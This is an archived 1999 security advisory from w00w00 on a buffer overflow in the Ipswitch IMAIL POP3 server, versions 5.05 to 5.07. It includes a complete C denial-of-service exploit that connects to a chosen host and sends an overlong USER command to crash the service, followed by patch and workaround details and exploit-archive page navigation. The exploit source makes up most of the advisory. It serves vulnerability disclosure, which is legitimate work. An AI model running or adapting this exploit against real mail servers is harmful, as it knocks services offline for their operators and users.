imail.txt

imail.txt: Posted Nov 8, 1999; Authored by Michael Davis; Due to improper bounds checking in Ipswitch's IMAIL POP3 server, a buffer overflow occurs when a lengthy username is sent (via "USER <200-500 character username>"). It has been tested this on version 5.07, 5.05, and 5.06. DoS exploit included.; tags | exploit, overflow; SHA-256 | 024c34f871eff512dad7f84e077f8d26c4ee44d0b3c97cadac9ee2725c368b32; Download | Favorite | View

imail.txt

w00w00 Security Development (WSD)

[See http://www.datasurge.net/www.w00w00.org until relocation of
w00w00.org is complete.]

Discovered by: Interrupt (mike@eeye.com)

Due to improper bounds checking in Ipswitch's IMAIL POP3 server, a buffer
overflow occurs when a lengthy username is sent (via "USER <200-500
character username>").

It has been tested this on version 5.07, 5.05, and 5.06.  According to
Interrupt, it appears to be a DoS (denial of service) attack, but there
has been no further testing to determine if it can be exploited to gain
higher privileges.

---------------------------------------------------------------------------
Exploit (by Interrupt):

/*
 * IMAIL 5.07 POP3 Overflow
 * By: Mike@eEye.com
 *
 * Demonstrates vulnerability
 */

 #include <stdio.h>
 #include <string.h>

#ifdef WINDOWS
 #include <windows.h>
 #include <winsock.h>
#else
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netdb.h>
 #include <netinet/in.h>
#endif

#ifndef WINDOWS
 #define SOCKET_ERROR -1
 #define closesocket(sock) close(sock)
 #define WSACleanup() ;
#endif

char overflow[] =
 "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";

int main(int argc, char *argv[])
{
#ifdef WINDOWS
   WSADATA wsaData;
#endif

   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   char *hostname;
   unsigned short port;

   if (argc <= 1)
   {
      printf("IMAIL POP3 Overflow\n");
      printf("By: Mike@eEye.com\n\n");

      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("If port is not specified we use '110'\n");

      exit(0);
   }

   hostname = argv[1];
   if (argv[2]) port = atoi(argv[2]);
   else port = atoi("110");

   printf("IMAIL POP3 Overflow\n");
   printf("By: Mike@eEye.com\n\n");

#ifdef WINDOWS
   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error setting up with WinSock v1.1\n");
      exit(-1);
   }
#endif

   hp = gethostbyname(hostname);
   if (hp == NULL)
   {
      printf("ERROR: Uknown host %s\n", hostname);
      exit(-1);
   }

   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Socket Error\n");
      exit(-1);
   }

   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   {
      printf("ERROR: Connect Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);

   /* Check to see if we get a +OK error code. If so then proceed. */
   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Recv Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
   }

   buf[bytes] = '\0';
   check = strstr(buf, "+OK");
   if (check == NULL)
   {
      printf("ERROR: NO +OK response from inital connect\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   {
      printf("ERROR: Send Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Sent.\n");

   closesocket(sockfd);
   WSACleanup();
}

---------------------------------------------------------------------------
Patch:

Ipswitch has patched the vulnerability and the latest version can be
downloaded from:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe

If you are unable to install the patch, a temporary workaround is to set
the IMAIL monitor to 10 secons, guaranteeing a quick refreshment period.
---------------------------------------------------------------------------

Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum,
interrupt, dmess0r, and K2

People who deserve hellos: nocarrier, minus, daveg, nny, eEye Digital
Security, SecurITeam, dark spyrit (of beavuh), and w00god blake

w00sites that deserve mentioning:
http://www.eEye.com
http://www.napster.com
http://www.technotronic.com
htttp://www.beavuh.org
http://www.securiteam.com

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

imail.txt

imail.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

imail.txt

Share This

imail.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems